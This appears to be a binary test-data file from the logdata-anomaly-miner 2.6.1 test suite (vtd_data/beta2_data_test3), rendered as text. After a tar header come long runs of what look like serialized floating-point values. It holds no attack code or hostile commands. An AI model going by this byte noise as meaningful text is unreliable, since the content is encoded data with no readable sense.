G?3Jh~G?,빩G?&G?^[G?'tWD7G?ʍJ|'G?RWOG?М1{G?VKG?KpЄ>G?)}-)G?JLbG?#ԫG? EPG?b:G?wu(ZG?G'KG?Ji{G?)G?-r G?z<=eG?&23G?d ,/G?=ItG?XeMzG?vҳaG?`XVG?ȄJG?r@/G?̙xG?qvx]G?a/+G?o G?͢3JG?;,G?vsG?mݦG?\t6G?.d G?n#|3G?Y_hG?b[G?n(?AcG?TU<_G?9JG?q kG?G?ӎG?>P"G?wYA@)sG? +G?/CG?O@q]G?$"G?iRyG?ԅeG?&(fG?,ctG?`存G?㪨G?]]t=|G?SAG?ʔJ|G?6G?ZfkG?2QG?s0`G?%T(>1G?kF@G?c/3G?29 G?6w'G?P"ŸG?JBÚG?ұG?y6G?h+X3G?} G?ݚ zbG?8cG?|%9G?sh#G?LF3G?%0e(G?FVLzMG?g`BuG?9G?:iG?NAG?&G?ٟd@"NG?! 2G?ś'G?4㝕G?BD0QG?܉G?aM)G?g&a}G?ԭ wG?yB5G?j^[G?U#G?6G?堽nG?N{4(G?W"?iAG?~ G?* AG?CFMG?I;! G?t4G?#~.G?5G?|\ChG?l8%,G?(HxsG?y9WG?oG?}톐)G?ޮН=G?.E+G?}tG?;NG?+Q G?6G?s/3G?덮%_G?ZڜG?(찙G?`dG?)"imG?}&x.G?v`,cG?)$%cG?kc!G? JG?+.U`gG?#չG??=G?cWG?љ _UG?C\G?Շ#oG?횉C0G?S?x)G?QPG?N6tG?ġj'6TG?'҄DG?7fcG?<ρC9G?2r QG? +G?lnvG?;m5G? `G?G?{G?S 4`G?gBG?gKG?ksG?V=#fG?袌4FG?xhOG?aG? Cط G?VG?G?ԡh~G?hZrG?~_hG?"G?f/ G?Ŭ#G? G?gTG?zG?iۗlG?l㗎G?V8)]1G?S5TG?DoaKG?jL%G?r8G?Ȁ6-XG?F@5!GG?6{pxG?ʱ|3G?G?γ)룿FG?u&G?~9jG? *}G??G?OgG?6G?!G?+ `G?CG?QG?4ZGDG?1&ݓG?&FG?G?)Q@UG?v1Q@G?G?ЪIG?<HG?.nQG?”AIG? ?ĶG?לG?+NG?Ʉ&_G?˗MG?vr*G?2G?/I%.G?S8 G?/B޾G?Z qG?nSG?!?SG?Զ/KG?V)zG?1݇ G?q|SG?LuK;HG?jTG?B5 VG?ꉾ$ G?F{0G?c^G?@kv-G?4gknG?۠RQG? ޡ G?GpרMG?IhG?3 4G?s .h `G?$7G?t G?ϯnG? G?_p:G?pG?cZG?R5#G?홦/uG?n:?G?~' G?WJG?߅IiG?f G?lEQG?dEOG?|#yG?w6G?ݿugG? KgH G?2]i4G?#y5G?h7G?u@wyG?d `G? lG?[pG?cG?PGG?LPG?̆G?FDLG?돮G?Fѫ.G?SlǧG?"f!G?fX*VG?G?axG?ҙhDG?}F^G?hG?,1uG?g1qG?zh1G? G?QaXG?'G?js~¶G?. }nG?'G?MBSG?ZiG?G?)!?߽G?6G? G?C/G?Е G?I!KlG?~G>ODZ_G?5\?/>G?wT]f;G?OG?:AG?[KkG?J72G?o.sG?2qzG?hO8XG?N=\G?͔>JG?ւBG?TQ*G?^sӜWG?VkһG?4rR޽G?駺iG?5h.G?vGG?lh2G?PxG?ဉ'l=G?8G?e$G?z(iG?Lt-G?GjtG>wG?S"D%G?G??@~G?ՖNG?T-G?{ܬJWG?kvG?P$,G?;܂G?wq%G?cZ9nG?6rG?C:G?Wz6`aG?fy$G?魠jCG?QT%OG?OU,G?s"3W-G?m!3UG?7 G?]殗G?y9d G?о},bAG?E vhG?ꇊN\G?-crG?Aլ)KG?2c%MG?yioGG?qUk.G?喝nG?Ks8TG?ٷ%>"G?vOG?>G?O"WkG?c -'`eG? \!eG?￉V/G? ,rG?ٍ~CG?s#G?]N>G? q*~#G?HZ&/G?u o@CG?)nWG?NAn3NG?!xG?e]G?w,9zG?ŷwG?,hG?EխG?G?wc G?@G?Е@LG?#G?nF G?'>5G?佥'vG? o^G?:S6G?o\UG?0 4G?!m5rG?`GG?3رG?CG?킨CG?,1rSG?_iG??-G?~pG?IJG?(6G? G?mxG?& G?FG?˃&FG?{.-~G?Z=3XG?TO$zyG?#q.PG?tzjEG?oW*3G?RpG?`}]vG?@G?(:AR G?Gj5G? suG? X7G?(G?}`3G?>;G?VZɎlG?UG?5cgG?qw4eG?x4vG?TxzG?2pG?!?,buG?q fG?(}eG?pG?na$G?-8RIG?oCG?Zz2G?>`G?"FG?e"MG?jG?p}G?@޼G?P G?ѻ˼G?;盗G?)jҦG?XZ>G?iG?A媅G?ھ.dG?G^8G?MjUG?춼oG?q=%vG?WjG?ّFvG?KfьG?eh1G?P_G?@G?:;G?"F(+G?RG?r6xUG?S";3G?qG?'G?֍]AOG?[8)G?]]GG?aK&G?8hMLeG?}_G?.VךG?СG?5G? 88hG?aG?ƻǦG?yG?yG?G?լDG?MuY\G?p<%eqG?#oٓ5?G?C^>:G?ٝ3tG?v@;G?PX"G?۽ pqG?cCsG?xOz%G?(ܻ?:G??G?G??Y21G?R2G?/G?WXͳ9G?{JoG? < G?TH35gG?-G?ˮjG?%Q`G?얫tG?A tG?Ңޥ/G?+QuG??iCG?ϖG?ԻG?沒8ЁG?E"G?xCG?D$wG?gG?cYOG?^0a:G?w%t"G?M;OG?ϿvG?VG?ɔ)G?,[ bG?˔pCG?悛=ĉG?[ݐtG?ZRG?#$G?X9G?V):G?@}(G?7 eG?IEG?sBLG?SyG?DG?Ŝ0aG?]G? >G?@KW+bG?2wvG? =G?U$ G?ژWՋG?(G?? {uG?A'G?zkqzNG?mȡG?a'urG?YG?~}LG?ͱ`ͻ\G?Æ.G? fq0G?colG?WG?JG?G?8|G?VO;LG?2J~G?M/Z/G?QmG?⾘)BG?**'"G?_4fηG?ޮU%2`G?Ʊl?vG?]$p G?XyRG?h$hG?jCwU-IG?킽oSG?ڥNMƚG?cG?<6A80G? R3}G?녂G?j`avG?ھgGG?ޫ KzG?=G?ǵ;'G? G?{̈́iG?$G?Tg#yG?EG?v~BG?k`G?S Q$G?:]G?vd6;G?/MG?G?y2ɵG?\TG?ZG?Qɼ)G?iG?bG?ȶG?X:qwG?FΔG?P.qG?(cG?ݾe2G?ҳG?#>G?VC{G?Dĩ@+G?[>G?& OG? .G?p{G?۬mhNG?4$;[G?ڐNЪŽG?ǔG?<3G?l G?F^G?2,G?G?.Zk~G?y4سG?*G?>1S5jG?EaG?jj7e?lG?L@G?^G?* G?Z(G?43ROG?z4aG?/=hG?xq(F~G? $G?_mIdIG?|G?+xG?Ԩb|G?Z 2PG?O5G?jG?$f 3G?-G?ӉǓ$G?T,G?dkG?q@M3G?hL\sG??{W3G?T eUG?޺+㯮G?$!_wwG??z,LG?ggG?ЮJG?8nG?hh0G? 9 G?ogOG?UuG?@zG?COG?Mvq87G?ZIG?Xj= G?"oG? 8IG?2P[pG?V'G?VG=G?^G?gnCG?.mޒ9G?֞G?~G?aBG?;,!G?*#OkG?9E(G?O4G?pfG?8x # 'G?鰹FG?4kG?'*'G?G?]*cG?GxeLG?<#G?m\9G?)!K)G?$G?|M'G?ЁG?ϨZ[TG?; tG?-MS6G?W2RT3G?gG?|S[G? G?͹-G?{W}G?(`G?bjcFG?쉼G?r3+G?-}%G?ꈂEvG?_Wq`G?w'ZlG?'?ĿwG? Bs^G?5G?Ӫ1G?.{sG?"R=iz?G?oO{x_G?3XΜG?ޗ-yG?#1i_G?j46G??"jG?:҅G?@eXLG?~xG?hŖ୭G?ۑ qG?ހG??MG?hAG?쉽q:G?̾ EG?"{G?߳nG?*G?o5oG?OEmG?>JG?U^~UG?Z5G?tG?!=G?H_CG? <$G?F*G?v] G?KG?ΜTG?q=G?DcG?*qQ)G?G?솠`G?,ӿ@G?PΊG?,(G?\ נG?ם:j7G?5PA G?ǜG?t6G?~G?O l$G?ďiNwG?QW 9G?~}G?4ImG?$ۋG? wG?[jG?S6G?:'G?MeG?H'LG?2/G?& Jj]G?M/NG?QG?pG?O<~G?AZG?冋~G?ˤOeG?N G?۳3G?&`G?`9G?}Y&G?N'G?OcjG?g}!SvG?ƴ;G?bJG?0<+G?ᾺG?% G?o<#\G?la0G?}~SG?2ibHG?W~lG?ޱfh>uG?uC G?wju%G?-A^G?T}G?↛Dm6HG? WwG?fw&xG?GC0G?oG?tu1G?9TG?zOG?wna0G?G?3G?ƒG?Vڀ-G?<as|G?e,8G?ڄSG?Ar.G?ˁS(G?+rG?$ G?D G?W5HG?eG?U^G?Tu-ȎG?q]{W?0G?ZcG?2,+EwgG?tvG?/zG?]'G?z6XtWG?܍QWvG?x/QaG?Pa{G?똦:C$G?v(ZG?WG?ǭWG?KG?p%G?2P1srG?ܨ`{G?uG?aG?)^lG?!j:G?, ^G? wG?Ϛ:G?eEkQgG?\v!dG?SC~hjG?ҴPG?RG?m@NDG?S~G?FMW{G?ЄZHG?ʓDG?#@$G?ךrU|G?7G?G?c G?_ƀYG?d˸G?v2dG?L7_G?v_=G??,DG?׆T4G?Rpw G?TB|CG?ˮWnG?w%n#G?NN]EG?gG?lG?˸9sIG? 6(G?XG?MEG?lzG?gkK-G? FrG?܊G?sն&G?(|)-jG?kLG?ǎG?`wqG?JO3G?u`yG?DG?A߇G?ޓd:QUG?Ae@G?b@G?>0G?srG?QN1e](G?%>7G?ExG?yG?%(DG?v>.ooG?Gki]ѺG?3PYuG?R*3G?ȎG?=kNSG?o6QEG??G?Q)G?>~HG?պ4;#G?G?j G?dn(OG?s(G?dv/G?a g>G?ZgG?;2eG?_rG?26ϙG?BG?`F*zYG?q1&D3(G? ~G?1G?1ƉG?C@DG?iƑG?9qG??G?>~`Σ/G?MzG?jD G?DV0G?[|0G?2 5G?چ̒hG?j氰G?gMtG?ՐWXG?܏.G?/ ]G?ɺV@G?ЎwG?ݟrG?>eG?⩹}ՠG?aUG?PjG?:G?'J G?u1G?^ r^G?G?yG?0qAG?5!%6G?-G? (G?u&G?T$RVG?+^+:G?ͭl`=G?lG?IRG?ԾG?vќJG?ȿG?]G?yCoG?1>O*\G?ֈ2LG?ݕzR0OG?cY^qkNG?YG?)ucG?\I|G?ȅG?G?wG?t|jG?VJG?G?xgG?o`G?(G?TvhG?ҚwCG?K0G?+VWG?ܯXG?Rp G?̧4nG?G?|" G?.nܯG?ȅy؅G?tPs^G?\qO2G? tG?-@zG?0'G?Z*G?q8w?G?R lG?%VG??n",G? 2uMG?h}\G?[G?VQӦG?怿z=G?烈uG?PMG?G?^mΔG?#7G?:g_ G?ժk"G?LG?pyhG?@ tG?G?T AG?h8G?5xQG?ʑGG?偬G?qDG?($PG?د:G?Wp1G?򭫽+G?цG?l0ua}G?OG?a'aNG?&~yG?2GG?"G?s/PG?W)G?ƺ=G?G?ά=>G?T~G?M G?oueG?+G?TG?3s|G?ݿ=7?G?dG?̞G?G?sE(LG?e G?Y]G?x G?FqG?JHG?}3LG?0- G?#UG?Kv:G?f?G?G?׬|G?蜎hG?'$2G?S~WG?3%G?L%U_G?~8}G?m G?qG?9˪-G?zK]G?g>G?ū],G?܅-G? sG?NGG?AꍽG?0<=S4IG?_@G?GfG?yG?i/}%G?Ӝc…G?')1G?.ۍm҇G?wDG?ENKG?bKmSG?WwG?FƩG? >>G?ngG?B/PG?G?0 =)G?౗zG?G?JG?9X0 *G?^bG?Ը)G?OG?TJG?ٌG?6mo%G?Ox}G?BDG?e NG?ŲŷG?*k#=G?쬨JG?4B{G?YgG?F G?`bG? Ux՛G?/țG?"G?BMG?I&xߝG? )כG?P G?s)G?t?$G?wG?S/G?쿳 5G?)G?tx0G?G?{姥G?tLG?*!LG?Ό=OFG?_wG?Msvj>G?:h_G?nzG?9ˠ'G?;LjG?CzhG?iRG?V&g{G?IJG?@iUn G?"G?MBG?u< G?4hG?G? JjG?WG?K gG?Z bG?#wG?-1rG?XŒG?|qG?/G?0٦$G?|#y;G?[G쎻G?q|v|G?-isYG?4G?Vd iSG?=G?)G?yF:G?ˣG?7=1qG?蘘=G?aE G?NG?%=G?XG?HY?G?jG?Ӕ+e\G?%rG?y&*XG?=G?ưyZG?rG?JA)5TG?gG?6lG?lOkiQG?<:i#G?]8gG?{‹G?rnlG?q4MG?$>iG?Ą +>G?bwrG?OAG?绺ǟG?Ԙ'G?'nYG?N/G?&*G?aqG?]:xG?GbQG?# :G?8[aG?e{|EG?ξG?ѨJ.G? .N+IG?йV(G?$G?|JG?!XGG?AUG?=~G? YG?VOG?#G?{3G?xnCRSG?UG?g'AG?tG?|JG?<7ӘG?ϫ?G?ẘH;G?)G?M}sG?ܸ5G? G?4!ȜG?խw0\G?06G? (G?stjĊG?@G? ETG?.MG?> D3G?[l0(G?"G?5ÀG?/NZG?vG?hG?fqӡ~G?&pE:G?`'G?jG?SMG?i*G?8G? lG?̶G?8 LKG?t#tG?soG??c@G?,#G?滺 rG?/G?8G?c)xȂG?*%x G?TOjG?G?_84%UG?#G?,7pG?gO3,G?-DzxCG?ǧ<5iG?hGx&G?Y RG?U$шG?d>jG?2ZפG?ĹG?UH7G?bT'`@G?Jhqs&G?noTG?ݼVhG?|YG?'i1>G?g2EG?vG?o,4#@G? dK1%G?QG?99G?PpG?e(G?L;րG?fG?Z~G?2(G?j:DG?-iG?8OSnG?`+KEG?DNG?#DG?Wj4:0G?ݰ5mG?G?UMG?G?L/wG?{z G?1ZG?+;ڷG?]@G?ExG?ь\G?DٽnG?xQG?X.G?1ByG?`H~TG?= nG?FCa9VG?9&G? gG?l RG?uG?IG?cK=1KG?9"yG?hZG?/ >G? ViG?$1G?2G?/]G?< CG?mGG?]XCq_G?$G?K9 \G?.ɭHg/G?G?:N|G?w^ pG?YAūG?D5G?WL9G?^G?댈mgG? G?셮@@QG>pQwG?ւ0cG?hlG?8&wG?mG?V饊G?[d G?T 4G?ݓUG?ZX`G?ZmG?K_n5G?_dqG?f̈́G?ٔ*_DG?=-9G?ҚSG?TG?y"\`EPG? ]G?,4?G?*#G?Þ~0_rG?jwPG?T)zG?1gG?_G?IvG?2G? =NG?B6G?QU<G?ւ<&}gG?28+G?Xn8G?ʦv'G?FrrG?bLG?o6G?xPG? G?G?^G??pG?7m]G? 4G?h;G?Զv: G?!wG?ꡩ'`G?S?G?N-\27G?Y$NG?Uc G?FZ6fG?8 >}G?{U"G?-_[G?x҇G?]>G? ߙG?85{^G?QG?NG?:+3G?oG?/gG?}5BG?6G?ї bpG?sb^G?r^g0RG?ÜG?vyG?ioG?2C'G??G?4iBG?nG?:H)5G?qG?8TG?ɬ2G?͈G?~0wG?|1G?ƚ*GUG?:EG?H G?7S6G?G?i)G?/G?֊: G?XG?ˆwG? G?G?%!`G? G?!cG?SG?S1G?7(}G?ga%G?̨G?G?򊤯NG?ʾG?후mQG? pG?^є QG?vJ}G?ЕW8MG?MZ)G?xG?SG?T G?XJAG?NG?#рG?v|x1G?ؗG?S=2G?UmMiG?IwG?Ari8G?놿G?nKStG?z[׊G?UYmG?/,G?7G?[skV>G?ؑWG?ȲG?,١|G?~.HgG?HuG?;r'G?TCG?Oh!G?壑NG?O犝G?F\G?;G?\~G?[u-G?䝨fsӜG?:4G?P-G?N*!ðG?ڢLG?]0KG?)ͿG?YG?z pG?,TG?Yp$G?ػ\G?nG?ӵsVG?iG?cXyG?1jڢG?dG?JA0)G?>qG?#)@G?٩SmG?9 6G?|$yG?ʹn*G?>G?tqPG?ʳ];G?Q!G?є[ݢG?=>G?lqG?g+]G?ͿyZG??#jGG?!nG?ԨeG?~tG?*nS#G?v#cG?j='G?<~GG?۞G?=3+G?/L0G?OhxG?beG?AIG?쓒G?PG? $MG?-JG?52"AG?R R=G?{,9 G?K$l[G?KG?PWU L+G?6G?N$ɄG?ʐqG?*TG?Zg"bG?Uҗ G?xK2yG?7]G?xG?G?@LG?%G?=WG?n<҇G? )G?|=? G?ߝAhG?xJG?kPH]jG?=GڗG?#S%G?޾[aIG?ҿJi^$G?c)G?wŸVG?Lh2G?.G?(6:RG?*G?T6qG?&EhG?N@ G?%GmG?:G?苾TG?̖rvG?c}G?t YgG?0M)JG?>JOqG? wMG?ػM9,=JG?5G?Q}G?)TG?M/.G?gG?5ecG?t(G?gڅ1G?&|G?2EG?M.4TG?G?e5jHIG?6|G?VB$G?OaMӄG?k]G?VUCG?(dKG?Jm G?v7lGG?е,fG?ܹG?0G? G?r7DG?\"G?젳0&.G?_xSG?߄pNG?YG?ųѕyG?Qk[dG?OXG?9y\EG?G?G?#n;G?ϿG?ze](e](ee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta2_data_test3000066400000000000000000000432761437606560100275320ustar00rootroot00000000000000F](](G?/J>G?5fO2G?n1G?)pS\G?F6G?蝀G?MѰG?>4jGG?jQG?7zG?<~G?]S>7+JG?~=$uG?0>6lG?с)"G? eG?q |%G?6G? 5G?Ŭ[W G?oҢG?BG?d8G?VJ$GG?P-G?3:G?GG?jL4G? G?43j{G?a5hG?֗? G?>sXG?̇G?tgKG?m-\G?}G?B G?r6wG?G:dG?呅+UXG?{G? G?DG?hLG?yOSG?_Gu`G?S AG?⎦++G?[?)9G?ǶzG? @0G?ywG?x {G?q\9G?W5G?eqG?G?n'֚iG?3Xy\G?ȡ[M)G?S G?R@^G?@MG?fG?266G?hҡ,r+G?"G?&}yG?l8 qG?K<G?Zf3rG?G?Gc5G?kG?wG?׺TpG?S|[tG?oc‹G?  G?|אָuG?V6@G?{lG?ԅUG?`G?J:G?7A%G?zFG?+EBG?"BȶLG?vNG?xG?K#G?# G?|G?SohG?UXeG?3#IEG?ƧG?~ ԋ(G?$oBG?TvG?#.G?n8R0G?r;/G? .G?.G?픗ŮG?'+G?8&-G?m@#G?FG?m9G?>2]fG? m582G?GR)G?i'pCG?|SG?ӏG? >G?33&G?@LG?!hG? xB'G?:3dG?G?5@G?bbBG?cAG?ýhG??NEG?ۊ$G?,ػ_dG? 5G?yyG?( G?,kIGG?&G?irG?0=G?')"G?gx~G?^*X G?9]G? BG?d=G?>>qG?&BG?~5G?d/G?Y1ԖG?iƜ3G?篚|G?o}GG?iP /G?s%f G?6eAG?vJJG?6YVG?;G?:}'G?P|G?c2G?ᐧ,TG?jG?\oHG?@蔡'zG? }G?qoG?BmG?C 'goG?w蘊G?{G?!5G?vC5G?ȃG?TA07G?j=G?aE@k3G?נI뛢G? c[G?{B/G?-*G?P\ G?2 XG?rGG?iz9G?]G?'7'tG?MݥbG?2wXG?hY}pG?18I{G?aMd6@G?AGG?RC;&G?C-cJG?SH3G?Z~EG?rjG?몝O1G?Zܯ^G?6$G?OItG?v/ccG?܉X5G?~| PG?z$G?JNGG?}QwG?jlp.YG?'`G?o&G?41G?ۏ G??f6UG?i)qasnG?v\G?@>G?9 G?V G?յG?ԌަG?Sc"!lG?f'LG?mA?G?]k6G?橿 WG?[ G?&nG?"FG?N3G?IV4G?ї2OG? pG?QQcG?[`rG?xTX5G?抁2D+G?c1G?8'>yqG?#NKwG?y" G?ZnG?RKDG?PpcG?*؏;G?t(G?ijG?dc%G?]1ŸG?q'G?w6M{H-G?.+0G?kEEG?_ G?{{vG?'G?^I\yG?9s`G?kYXP^G? j VG?@̼BCG?;!G?!4 G?ZK2NG?s|sG?KCG?DqSD:G?_IpG?M*{G?|PG?j.*RG?-;G?;i>(4G?XG?6,G?Z\&YG?@UM8G?y,)G?m@D~G?@3kG?EWHaG?3{G?+bI8oG?ߖG?yCǵG?G?aOWG?.:%G?,L}G?x-)G?FUxZG?߁G?˯qɫG?䲻AqG?u:IG?ꉶv_LqG?jCfPG?~3hsG?G?~&G?#+jG?A_G?jUG?.F<G?l9G?j7+ʅG?愚G?VG?ں*G?qAG?Bp ?G?顨ܐ`G?ė*仳G?|"6#G?s6#RG?"[ G?L%G?=z=G?yG?[ G?ϔf`G?뱝4xG?տiDG?=hG?UJK G?KVUG?CeJ/G?>DG?~dG?ZˉG?O Ml+G?c`6PG?Z8mG?̲{NG? G?gf@0IG?@G?U:G?hG?݌ØG?슫8XG?btG?%%YG?nG? 9G?"tG?Srk0G?-xG?@YG?U^dG?žBG?&!G?j9G?lgG?9$3G?SG?0G?)G?B`:*G? x1G?sFOG?8ݽG?~#HgG?M~+G?hlG?cG?]%MvG?UG?ʃɖׅG??CG?ᳳڰ>G?T\r/G?QXn$G?A0uG?铬5G?u]X/G?ۏ=ÏG?-/ԼG?:bG?)'G?L^;$G?G?uع#iG?@z8QxG?Q-G?ܫzG?G?:#~G?pNG?]\}G?&G?jEG?b٢m&G?m{|vG?RD1G?nG?NG?fG?gG?F\1G?alOG?خ K'G?/'hG?lg@5*G?ph˅G?cG?rmG?RץHG?sst:G?CZYG?'G?8w?JG?:u7G?朮V @G?ꀢwG? OG?oCrG?銗 9G? fE:G?+`"aG?AXG?6adG? сG?̎G?`EG? ` G?H$G?J&EL#G?1pG?kzG? FjG?πgMG?9 oJG?'G?~G?kǼoG?E_b(G?i G?E{"P)G?pIG?v|TG?G?n`G?烔]DžG?[G?l?KG?FgG?;;=oG?uLRG?O2G?laG?^黶bG?[IG??SG?پG? ޕG?㣲z0G?zpG?wWG?+wNtWG?q<9G?;!97 G?BzG?vjRG?㾙G?2/G?/G?.G?槭}nG?`Gi8G? 5G?ryݠPG?1r]kG?9#ի G?"G? G? 1%dG?ှ3u`0G?`NG?DݧG?能#G? $1G?꽟/ BG?SG?pG?r7G?!XG?o~G?G?OG?; G?{G?+iG?SȻuG?IeG?JiG? OG?3G?<: G?J oqG? ~ G?fG?O4 G?7'HG?rfG?LTyG?-'ۼG?{G?uBG?ݬDGG?G?LG?DG?żG?lG?>oDG?ƱG?|sG?VG?~5\JjG?@G?[ [G?5n8zG?(gitG?subG?aG?煳DHG?8G?)z7G?}y>yG?c/;KG?G?bŒG?u `G?⢥+G?2G?ԃG?o'WG?<#HkG?鳇GFgG?Eƿ7G?0}]G?F;)G?tcG?öYAG?QG?S6O:G?I yG?{;IG?SG?6tG?ۿlG?;ߧG?3/G?PrmG??gQG?RsG??G?InhG?F_ohiG?? G?d%7G?/G?&4CG?ZO1G?8&#GG?처.Y$!G?f-tzG?'&|jG?rc L G?o5G?驑BJHG?v=`XG?hG? 2`8G?xXe]G?WqCG?'G?VP G? "6G?R!,;/G?~d)G?큡ԛG? G?НǼ/G?A F|G?izG?yHG?j}UG?g0G?wO G?CB>G? ݔͱG?BWG?AfZG?觠|"G?hҠDG?74&G?PeG?G?ISG?)m2G?Qh6SG?qlbG?)1QG?.>:G?X*aXG?i= G?x-eG? AG?pṩG?qsG?{VG?X1G?ܜG?+G?g2UG?:QVaG?s0,G?5kG?@;G?gKdkG? h|oG?,*G?fG? 4iG?{tQCG?{Q\G?!oG? E MG?H]nFG?71G?+FTG?$$8G?"#xjG?법 5G?8޸MG?3ǬG?Po9lG?G?@\kG?僠~SG?(!* G?F^+^ G?E1LG?"ѽG?M{2G?t^NYG?%&mG?'s/G? G?!G{G?IG?[.G?NbG?7:UG?G?xG?x_"G?WG?vϤG?%ʞG?=iigG? (~)G?dG?k{8G?* G?wkG? G?BqQG?>;ZG?ct G?탱 G?o[#G?L^ G?@G? dPG?:|?G?X \G?\̈yG?kYG?o0UG?s]ۮYG?盼;.PG?۩iGG?&Mc*G?[MuG?̑3zG?svSaG?UAG?pcacG?ݿMZG?MG?vG?_/ѳG?#9G?B*G?bIG?VSrG?UåG?)*euG?] G? )g}G?k8AAG?ބ&G?_̤G?J"kG?JмG?=`G?gG?)KgCG?6y% G?)'G?^G?yWG?v>G?ȡG?G?8£G?|G? a(G?ꙏӓG?s1G?'nG?ݴgG?~ G?ݝG?JsG?KG?O9VaG?[Y4%G?وlr#rG?1bG?G?G?+eG?P2ZcG?!>j_G?`QG?/\G?ɛG?tG?)uX(G?u,NG?OoG?ꃊG?0i-G?<ߩz{QG?{JG?7ȭ8G?W;G?!)G?ݿ쇥G?9 G?:aG?W~tyG?(*F5YG??sG?.G?.ZG?yG?Kt^AG?꜃wVG? P$~G?G 6vG?CaG?qei[G?%̻RG?wG?# 7G?G?S5;G?TIIG?1kHG?%,gbG?nx8G?CՌmG?¤HoG?5?0G?T41?G?g;+dRG?84G?dhh\G?G?vIG?.^'G?ۇ^S~G?G G?'rG?wvG?T~VG?'%G?6G?]{yG?B7,G?BPG?jwuvsOG?FhgG?:aOG?_}-G?j|G?+reG?>`=G?k&G?G?|n%5G?&GkZG?YΚG?SG?<iG?kP] G?{eG?)6G?g`FG? { G?CG?[G?eG?/xG?贿04c;G?%yG?{O|G?v7}G?`q"GIG?#FjG?ATG?нG?dG?wGVCG?!pG?ȫt)G?咯G?3kG? *Z[G?\1G? fG?+\ G?wCG?֍| 7sG?eYBG?mgUGG?/NG?vLbG?TG?Ww!pG?^3G?OX}G?݁ZۋgG?N!lG?w5~G?Ľ0G?꒔ߖ4G?clG?cG?wCyG?J . G?뫾4nG?}HmG?_P<@G?e%X#EG?q+`xG?ZdG?I|G?줆oNG?0 %GG?+kG?0ՠtG?Co G?)$FeG?^D%G?FG?k6G?>ՐG?G?/_Q#G?f^G?nG?/M8-TG?"ӹ{G?鎗KգG?KfG?*[/G? G?}mG?ܽG?i!tG?$eyH1G? rewG?[zkRjG?莣QG?ԏ wG?S YG?q:ƼG?Cn#4G?}n?G?%vVG?C_%G?[x:G?;UK G?E!G?+ G?هG?ibÎG?Iĸ%G?^CG?CG?JG?",6}G?,C ^G?:)G?ȫ%7F G?eqhG?pNG?4&G?C/|G?<$SG?餥NG?AG? G?̑G?ZiWG?j JG?5DYyG?V))G?e\G?I< G?vjG?@CǑG?vRP'G?cG?CCvG? Q G?5-2VG?1|G?/G?,$zG?嚽.G?ڥPUG?.ngG?D:G?vG?/iG?VճWG?|釶G?h~ UG?G?ZRG?E s.:G?4VZ(G?ZcsqG?2U G?aJG?1ƫG?9G?WV.DG?waėG?Ӫ-G?h<⪹G?XqG?XbZG?㟻`G?kpG?傂OG?E{}G?MzG?Y4)G?bgOG?XG?DفG?LBvG?P;/YG?-vG?nZG?WG?xI-XG?E QG?T9OG?LhpG?AG?U+VG?ޛH+xCG?ꄓԸG?bG? nhG?3G?qfclG?G?傑+kTG?SG?V~G?qTG?P~G?q1G?혺^zG?V џFG?d G?1ՙ"mG?ߞ_xcrG?OdG?CZfG?t-l8G?)CyzkG?wSoՕMG?GIEG?t=}zG?GG?JCG??G?mR$G? toG?]G?WFmCJG?$%zG?h[G?:aG?Y0*G?zI)G?4G?Y,@G?4jG?n[G?{G?TͧZkG?6{G?=>z1G?8nxG?柜}EG?ۡsA@G?kôG?Mo "G?9G?浏ңG?VqG?ۑq$G?ۆۣPG?ꞒEyzNG?͢G?_j`iG?oopyG?[EG?>&~G?1G?4{mG?|,(G?U.G?됌kzG?yهG?XȤNG?睁YG?1} G?^tG?o@G?-KnR9G?漀K2NG?xRG?=>G?I 1G?ꋗ' G?ߨG?iNG?[)G?OȸG?SQG?~G?ۖG?KG?XکG?e )G?駎G? limG?AaڳG?B0{3G?\, K`G?ZnG?}5G?&b8 >G?DS+5G?"bG?u)VG?ڱT7G?keG?XG?fo G?טHG?Es.NG?tG?SxDG?YG?}@gkG?nvXG?iG?$Y=,G?-"&G?|hG?G?UhdxG?;S#G?tG?vG?SG?Xyױ}G?%_#sG?oÈG?(Q,G?G?kĖ%G?!p#G?ϵ [G?""G?EfFG?ߜ :G?AnG? O*G?lnlG?.&J,G?L9G? yBG?uPdG?:fp{EG?SVG?sݮ]G?mG?\=mG? G?OG?,KG?䯅(G?G?94 9G?5G?(G?;Y~G?^,ХdG?4=dG? IG?"2G-G?胤40G?#G?ⵋJ~G?"G?~ >XG?X ^G?okTG?䔁ڮkG?%{gG?j~rG?4G?cg]$G?f/pf4G?C7G?HSG?HG?b|JG?.iG?dtG?YDW:RG?%FIG?*"LG?S,@K?G?$0G?ѳwfG?ʛlG?*OG?hieG?B9$2G?exQmG?ӕwG? G?@ucG?oڨG?鑍AY}G?N}T $(G? }G?hGSG?P G?"%6G? WG?̣ 5G?2G?HdJG?9lQG?(ӌ1G?Ꟙ69-G?cG? /e;G?U`G?[?G?OTVG?졝 G?9az4G?1G?uG?E]TG?R=G?L&@'gG?#&nZG?8JeG?n!LG?@"G?{kG?f@:MG?䜐# ,G?6eG?< G?=qG?Bzo>G?42%yG?ǕG?& G?"G?2 G?}G? jG?ZʤG?;OG?`$*G?TG?)G?NG?pM[G?**$IG?4G?~̈G?@HG? EwiG?56@iG?ߨEGG?HeZG?:!fG?U;؊G?ܷG?1~)G?[=G?ꤻ"G?Jܞ?G?qG?P/G?*tL^|G??8vG?@଼dG? cb{G?9P*G?[G?Td4#G?:"~G?ntEvG?b.pG?b8|4G?7hZ7G?'?KG?--G?UݧG?[1_xG?R@G?񼄞yWG? yQG?۪d%>G??k ZG?K^tG?х)G? $G?ǮG?I4BdG?HX G?{{G?팞yG?G?%߶^G?-*_ǛG?GG?#MG?= wG?t*tG?ѧG?auMG?sj]4@G?2G?QЇ;(G?䋍X[G?kG?"LG?wx;G?ԗ>G?䗹^G?$eG? =#VG?,G?k‘G?`G?"q OG?'CsZG? 5V*G?x, s\G?n:DG?}"G?k ;HG?ۙ^mG? mc=kG?DDG?fG?ÎVYLG?DBG?⻑2gG?+7eG?qI{لG?4I5G?FG? sG?êG?]*G?gxáG?E$G?|rG?ߎ*pG?mnꄚG?2fkG?8E*G?:vMPG?o&(yG?Hi\G?eG?⌺9G?:НG?aVǑG?lu36G?XBeG?fG?wY|AG?1̀YG? '-G?E,G?d* G?h.G?JjG?ٮG?&C\&G?lpG?ICtMG?c- G?s3e8(#G?HMOtG?_G?bZ~VG?3KoG?9SG?ӹG?~G?kJ+G?C3BG?ܬG?b(uG?AC{MʒG?kJG?5u/G?nK G?~PDG?:G?a=hG?⮰G?MKhG?PEG?WCG?.G?vaG?鏉G?G 